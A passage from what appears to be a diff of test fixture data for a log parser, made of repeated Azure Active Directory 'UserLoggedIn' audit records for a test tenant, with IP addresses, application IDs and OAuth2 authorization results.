"ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "21166e08-6589-4c2d-a325-c97ba45f2200", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "a8114a24-d342-4689-b75e-51e6386763de"} -{"InterSystemsId": "ede626b9-2035-4d02-8330-201c4ae82af6", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:25:21", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": 
"83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "98612804-9aa6-40a4-b72a-808bc7742000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "1eaf9c65-8c67-4cd9-9277-771589113752"} -{"InterSystemsId": "fc5c6c90-a6ba-486c-b685-8d67c529d3aa", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:39", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "6e184f6f-887b-4410-b24d-723031366000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 
10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3c439e46-d454-4767-9320-1e75540821b7"} +{"InterSystemsId": "03616b3a-fc75-46a1-b34a-2d82fc8f1e7e", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:13", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c4206c29-46c2-4a6f-a46b-735107705400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "ca0efc24-1b89-4962-8fef-a3ac5437302f"} +{"InterSystemsId": "05d69096-cb90-4690-ae69-8acd5177b3e0", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
"CreationTime": "2020-02-12T10:53:24", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "ed155e11-60b3-4764-b9aa-05c35f3bb800", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "b53de36d-ea71-4ebf-9b71-feb431bd4eba"} +{"InterSystemsId": "0f5eb16e-8b22-49bf-a927-f6f310fd5879", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:29:01", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", 
"Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "6634d05a-72ec-4c27-8e69-03c57b202000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "10e2d141-839e-4913-ab3d-6cf1f4856eae"} +{"InterSystemsId": "1150acae-a48d-4752-8847-7bacb7fe6e6c", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:52:06", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1809f830-b010-4389-9607-e01ae175ca00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": 
"False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "68b3fd99-0dae-4479-926d-03cc0073dd08"} +{"InterSystemsId": "16e81fcc-add3-46c2-8834-10ce330ffe76", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:53:22", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "2a84e6ff-7340-426e-9d0d-e53092c0c600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "550af372-cdfd-4286-a1b7-d58df0dcd5d6"} +{"InterSystemsId": "172703f7-324e-415a-a846-c39ca97eb1c8", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:23", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": 
"81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "d66cd29f-596e-4878-b756-92b545d25f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "b5f59a43-00cf-42c4-8685-a7166fd20e38"} +{"InterSystemsId": "17f8756c-0bfa-49ad-8537-ada4e17a5f7d", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:41", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1b395e92-5d02-408f-8bfe-139098a95500", "ExtendedProperties": [{"Name": "UserAgent", 
"Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "32e7fb94-6289-4fb4-855b-2ab78671ca4e"} +{"InterSystemsId": "22aac168-9d0d-4c70-b94d-adc337ab7b06", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:22", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "280b3410-9d51-4ce3-952d-5bba18ea6600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "7314a65a-f383-40fb-a0c7-00c6c4cfabc0"} +{"InterSystemsId": "23321532-a321-4c97-909d-9489979777d6", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": 
"2020-02-12T10:52:05", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1909acba-a486-4ffc-805c-09fb73c0bf00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "97b494ee-9ba1-4444-b052-3459bdc9eaa5"} +{"InterSystemsId": "291fb7ce-4e56-47fd-a78e-4e9012f112ab", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:45", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "5e3ce6c0-2b1f-4285-8d4b-75ee78787346", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], 
"ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "9d47f3e0-1b2d-4c1c-b47b-dcf4bc4d5700", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "391870e6-1729-40ae-9ebb-51e0652fec9b"} +{"InterSystemsId": "30e5377b-31d8-42c2-8170-13404afacde7", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:51:49", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "8971516f-3ef3-4de0-b6b8-ebfae386bc00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
"AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "a7538fb0-3213-41dc-ab38-1aed787e0cdc"} +{"InterSystemsId": "32e2f533-40fb-4783-8c66-d1bad7e1cc88", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:29:02", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "74ab94ce-8928-4aff-8fa2-a66ad6d41f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e2a15fc0-6892-41f5-a41c-e515231cbb0a"} +{"InterSystemsId": "3c5d16f4-16a6-45f4-a53d-abb86e35005b", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:08", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": 
"175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "f67a1615-4606-4673-b6fb-68f716345800", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e11538ff-5fe1-4fdd-8c5d-219d85c47bb3"} +{"InterSystemsId": "40077a75-7b58-4623-a64a-f1b7de70fa54", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:27", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "4d1bd763-9b0b-4d5a-bda9-5c7a0a0a6000", "ExtendedProperties": [{"Name": "UserAgent", 
"Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e031670b-bb84-45ee-94ff-0e70a8cd1138"} +{"InterSystemsId": "425503c9-ccbf-4674-8f1e-4d56510474fd", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-08T14:33:54", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "67.43.156.12", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "67.43.156.12", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "57ef1056-6ce2-424a-b241-ce3939d00900", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "d39944c4-6766-4a89-8d5a-c789175830ee"} +{"InterSystemsId": "4409eeeb-0ca5-42dd-99d9-4a6b2fabfa4f", "OrganizationId": 
